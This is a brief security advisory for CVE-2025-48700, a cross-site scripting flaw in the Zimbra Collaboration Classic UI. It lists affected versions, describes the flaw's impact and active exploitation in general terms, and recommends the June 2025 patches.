CVE-2025-48700

Name of the Vulnerable Software and Affected Versions Zimbra Collaboration (ZCS) version 8.8.15 Zimbra Collaboration (ZCS) version 9.0 Zimbra Collaboration (ZCS) version 10.0 Zimbra Collaboration (ZCS) version 10.1

Description A Cross-Site Scripting (XSS) issue exists in the Zimbra Classic UI due to insufficient sanitization of HTML content. This allows attackers to execute arbitrary JavaScript within a user's session by using crafted tag structures and attribute values containing an @import directive and other script injection vectors. The issue is triggered when a user views a specially crafted email message, requiring no additional user interaction, and can lead to unauthorized access to sensitive information or full email account takeover. Over 10,500 servers worldwide have been identified as unpatched, and the issue is being actively exploited in the wild, with some incidents involving network-wide pivoting after the initial compromise.

Recommendations Update Zimbra Collaboration (ZCS) version 8.8.15 to the June 2025 patched version. Update Zimbra Collaboration (ZCS) version 9.0 to the June 2025 patched version. Update Zimbra Collaboration (ZCS) version 10.0 to the June 2025 patched version. Update Zimbra Collaboration (ZCS) version 10.1 to the June 2025 patched version.